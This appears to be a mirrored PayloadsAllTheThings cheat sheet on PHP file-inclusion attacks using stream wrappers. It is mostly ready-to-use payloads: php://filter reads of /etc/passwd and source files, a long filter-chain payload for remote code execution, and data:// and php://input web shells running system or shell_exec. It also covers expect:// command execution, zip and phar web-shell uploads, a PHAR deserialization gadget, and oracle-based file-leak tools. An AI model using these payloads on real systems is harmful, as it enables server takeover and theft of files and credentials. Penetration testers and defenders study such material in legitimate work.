wrappers.md (20342B)
1 --- 2 title: "Inclusion Using Wrappers" 3 topic: "File Inclusion" 4 topicSlug: "file-inclusion" 5 sourcePath: "File Inclusion/Wrappers.md" 6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/File%20Inclusion/Wrappers.md" 7 sha: "3ac27901c711" 8 isReadme: false 9 --- 10 11 # Inclusion Using Wrappers 12 13 A wrapper in the context of file inclusion vulnerabilities refers to the protocol or method used to access or include a file. Wrappers are often used in PHP or other server-side languages to extend how file inclusion functions, enabling the use of protocols like HTTP, FTP, and others in addition to the local filesystem. 14 15 ## Summary 16 17 - [Wrapper php://filter](#wrapper-phpfilter) 18 - [Wrapper data://](#wrapper-data) 19 - [Wrapper expect://](#wrapper-expect) 20 - [Wrapper input://](#wrapper-input) 21 - [Wrapper zip://](#wrapper-zip) 22 - [Wrapper phar://](#wrapper-phar) 23 - [PHAR Archive Structure](#phar-archive-structure) 24 - [PHAR Deserialization](#phar-deserialization) 25 - [Wrapper convert.iconv:// and dechunk://](#wrapper-converticonv-and-dechunk) 26 - [Leak file content from error-based oracle](#leak-file-content-from-error-based-oracle) 27 - [Leak file content inside a custom format output](#leak-file-content-inside-a-custom-format-output) 28 - [References](#references) 29 30 ## Wrapper php://filter 31 32 The part "`php://filter`" is case insensitive 33 34 | Filter | Description | 35 | ------------------------------------------------------------ | -------------------------------------------- | 36 | `php://filter/read=string.rot13/resource=index.php` | Display index.php as rot13 | 37 | `php://filter/convert.iconv.utf-8.utf-16/resource=index.php` | Encode index.php from utf8 to utf16 | 38 | `php://filter/convert.base64-encode/resource=index.php` | Display index.php as a base64 encoded string | 39 40 ```powershell 41 http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php 42 http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php 43 http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php 44 http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php 45 ``` 46 47 Wrappers can be chained with a compression wrapper for large files. 48 49 ```powershell 50 http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd 51 ``` 52 53 NOTE: Wrappers can be chained multiple times using `|` or `/`: 54 55 - Multiple base64 decodes: `php://filter/convert.base64-decoder|convert.base64-decode|convert.base64-decode/resource=%s` 56 - deflate then `base64encode` (useful for limited character exfil): `php://filter/zlib.deflate/convert.base64-encode/resource=/var/www/html/index.php` 57 58 ```powershell 59 ./kadimus -u "http://example.com/index.php?page=vuln" -S -f "index.php%00" -O index.php --parameter page 60 curl "http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php" | base64 -d > index.php 61 ``` 62 63 Also there is a way to turn the `php://filter` into a full RCE. 64 65 - [synacktiv/php_filter_chain_generator](https://github.com/synacktiv/php_filter_chain_generator) - A CLI to generate PHP filters chain 66 67 ```powershell 68 $ python3 php_filter_chain_generator.py --chain '<?php phpinfo();?>' 69 [+] The following gadget chain will generate the following code : <?php phpinfo();?> (base64 value: PD9waHAgcGhwaW5mbygpOz8+) 70 php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.UCS-2.UTF8|convert.iconv.L6.UTF8|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp 71 ``` 72 73 - [LFI2RCE.py](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/File%20Inclusion/Files/LFI2RCE.py) to generate a custom payload. 74 75 ```powershell 76 # vulnerable file: index.php 77 # vulnerable parameter: file 78 # executed command: id 79 # executed PHP code: <?=`$_GET[0]`;;?> 80 curl "127.0.0.1:8000/index.php?0=id&file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd" 81 ``` 82 83 ## Wrapper data:// 84 85 The payload encoded in base64 is "`<?php system($_GET['cmd']);echo 'Shell done !'; ?>`". 86 87 ```powershell 88 http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4= 89 ``` 90 91 Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+` 92 93 ## Wrapper expect:// 94 95 When used in PHP or a similar application, it may allow an attacker to specify commands to execute in the system's shell, as the `expect://` wrapper can invoke shell commands as part of its input. 96 97 ```powershell 98 http://example.com/index.php?page=expect://id 99 http://example.com/index.php?page=expect://ls 100 ``` 101 102 ## Wrapper input:// 103 104 Specify your payload in the POST parameters, this can be done with a simple `curl` command. 105 106 ```powershell 107 curl -X POST --data "<?php echo shell_exec('id'); ?>" "https://example.com/index.php?page=php://input%00" -k -v 108 ``` 109 110 Alternatively, Kadimus has a module to automate this attack. 111 112 ```powershell 113 ./kadimus -u "https://example.com/index.php?page=php://input%00" -C '<?php echo shell_exec("id"); ?>' -T input 114 ``` 115 116 ## Wrapper zip:// 117 118 - Create an evil payload: `echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;` 119 - Zip the file 120 121 ```python 122 zip payload.zip payload.php; 123 mv payload.zip shell.jpg; 124 rm payload.php 125 ``` 126 127 - Upload the archive and access the file using the wrappers: 128 129 ```ps1 130 http://example.com/index.php?page=zip://shell.jpg%23payload.php 131 ``` 132 133 ## Wrapper phar:// 134 135 ### PHAR archive structure 136 137 PHAR files work like ZIP files, when you can use the `phar://` to access files stored inside them. 138 139 - Create a phar archive containing a backdoor file: `php --define phar.readonly=0 archive.php` 140 141 ```php 142 <?php 143 $phar = new Phar('archive.phar'); 144 $phar->startBuffering(); 145 $phar->addFromString('test.txt', '<?php phpinfo(); ?>'); 146 $phar->setStub('<?php __HALT_COMPILER(); ?>'); 147 $phar->stopBuffering(); 148 ?> 149 ``` 150 151 - Use the `phar://` wrapper: `curl http://127.0.0.1:8001/?page=phar:///var/www/html/archive.phar/test.txt` 152 153 ### PHAR deserialization 154 155 :warning: This technique doesn't work on PHP 8+, the deserialization has been removed. 156 157 If a file operation is now performed on our existing phar file via the `phar://` wrapper, then its serialized meta data is unserialized. This vulnerability occurs in the following functions, including file_exists: `include`, `file_get_contents`, `file_put_contents`, `copy`, `file_exists`, `is_executable`, `is_file`, `is_dir`, `is_link`, `is_writable`, `fileperms`, `fileinode`, `filesize`, `fileowner`, `filegroup`, `fileatime`, `filemtime`, `filectime`, `filetype`, `getimagesize`, `exif_read_data`, `stat`, `lstat`, `touch`, `md5_file`, etc. 158 159 This exploit requires at least one class with magic methods such as `__destruct()` or `__wakeup()`. 160 Let's take this `AnyClass` class as example, which execute the parameter data. 161 162 ```php 163 class AnyClass { 164 public $data = null; 165 public function __construct($data) { 166 $this->data = $data; 167 } 168 169 function __destruct() { 170 system($this->data); 171 } 172 } 173 174 ... 175 echo file_exists($_GET['page']); 176 ``` 177 178 We can craft a phar archive containing a serialized object in its meta-data. 179 180 ```php 181 // create new Phar 182 $phar = new Phar('deser.phar'); 183 $phar->startBuffering(); 184 $phar->addFromString('test.txt', 'text'); 185 $phar->setStub('<?php __HALT_COMPILER(); ?>'); 186 187 // add object of any class as meta data 188 class AnyClass { 189 public $data = null; 190 public function __construct($data) { 191 $this->data = $data; 192 } 193 194 function __destruct() { 195 system($this->data); 196 } 197 } 198 $object = new AnyClass('whoami'); 199 $phar->setMetadata($object); 200 $phar->stopBuffering(); 201 ``` 202 203 Finally call the phar wrapper: `curl http://127.0.0.1:8001/?page=phar:///var/www/html/deser.phar` 204 205 NOTE: you can use the `$phar->setStub()` to add the magic bytes of JPG file: `\xff\xd8\xff` 206 207 ```php 208 $phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>"); 209 ``` 210 211 ## Wrapper convert.iconv:// and dechunk:// 212 213 ### Leak file content from error-based oracle 214 215 - `convert.iconv://`: convert input into another folder (`convert.iconv.utf-16le.utf-8`) 216 - `dechunk://`: if the string contains no newlines, it will wipe the entire string if and only if the string starts with A-Fa-f0-9 217 218 The goal of this exploitation is to leak the content of a file, one character at a time, based on the [DownUnderCTF](https://github.com/DownUnderCTF/Challenges_2022_Public/blob/main/web/minimal-php/solve/solution.py) writeup. 219 220 **Requirements**: 221 222 - Backend must not use `file_exists` or `is_file`. 223 - Vulnerable parameter should be in a `POST` request. 224 - You can't leak more than 135 characters in a GET request due to the size limit 225 226 The exploit chain is based on PHP filters: `iconv` and `dechunk`: 227 228 1. Use the `iconv` filter with an encoding increasing the data size exponentially to trigger a memory error. 229 2. Use the `dechunk` filter to determine the first character of the file, based on the previous error. 230 3. Use the `iconv` filter again with encodings having different bytes ordering to swap remaining characters with the first one. 231 232 Exploit using [synacktiv/php_filter_chains_oracle_exploit](https://github.com/synacktiv/php_filter_chains_oracle_exploit), the script will use either the `HTTP status code: 500` or the time as an error-based oracle to determine the character. 233 234 ```ps1 235 $ python3 filters_chain_oracle_exploit.py --target http://127.0.0.1 --file '/test' --parameter 0 236 [*] The following URL is targeted : http://127.0.0.1 237 [*] The following local file is leaked : /test 238 [*] Running POST requests 239 [+] File /test leak is finished! 240 ``` 241 242 ### Leak file content inside a custom format output 243 244 - [ambionics/wrapwrap](https://github.com/ambionics/wrapwrap) - Generates a `php://filter` chain that adds a prefix and a suffix to the contents of a file. 245 246 To obtain the contents of some file, we would like to have: `{"message":"<file contents>"}`. 247 248 ```ps1 249 ./wrapwrap.py /etc/passwd 'PREFIX' 'SUFFIX' 1000 250 ./wrapwrap.py /etc/passwd '{"message":"' '"}' 1000 251 ./wrapwrap.py /etc/passwd '<root><name>' '</name></root>' 1000 252 ``` 253 254 This can be used against vulnerable code like the following. 255 256 ```php 257 <?php 258 $data = file_get_contents($_POST['url']); 259 $data = json_decode($data); 260 echo $data->message; 261 ?> 262 ``` 263 264 ### Leak file content using blind file read primitive 265 266 - [ambionics/lightyear](https://github.com/ambionics/lightyear) 267 268 ```ps1 269 code remote.py # edit Remote.oracle 270 ./lightyear.py test # test that your implementation works 271 ./lightyear.py /etc/passwd # dump a file! 272 ``` 273 274 ## References 275 276 - [Baby^H Master PHP 2017 - Orange Tsai (@orangetw) - December 5, 2021](https://github.com/orangetw/My-CTF-Web-Challenges#babyh-master-php-2017) 277 - [Iconv, set the charset to RCE: exploiting the libc to hack the php engine (part 1) - Charles Fol - May 27, 2024](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1) 278 - [Introducing lightyear: a new way to dump PHP files - Charles Fol - November 4, 2024](https://web.archive.org/web/20250809094219/https://www.ambionics.io/blog/lightyear-file-dump) 279 - [Introducing wrapwrap: using PHP filters to wrap a file with a prefix and suffix - Charles Fol - December 11, 2023](https://www.ambionics.io/blog/wrapwrap-php-filters-suffix) 280 - [It's A PHP Unserialization Vulnerability Jim But Not As We Know It - Sam Thomas - August 10, 2018](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf) 281 - [New PHP Exploitation Technique - Dr. Johannes Dahse - August 14, 2018](https://web.archive.org/web/20180817103621/https://blog.ripstech.com/2018/new-php-exploitation-technique/) 282 - [OffensiveCon24 - Charles Fol- Iconv, Set the Charset to RCE - June 14, 2024](https://youtu.be/dqKFHjcK9hM) 283 - [PHP FILTER CHAINS: FILE READ FROM ERROR-BASED ORACLE - Rémi Matasse - March 21, 2023](https://web.archive.org/web/20260228090126/https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html) 284 - [PHP FILTERS CHAIN: WHAT IS IT AND HOW TO USE IT - Rémi Matasse - October 18, 2022](https://web.archive.org/web/20260212042712/https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html) 285 - [Solving "includer's revenge" from hxp CTF 2021 without controlling any files - @loknop - December 30, 2021](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)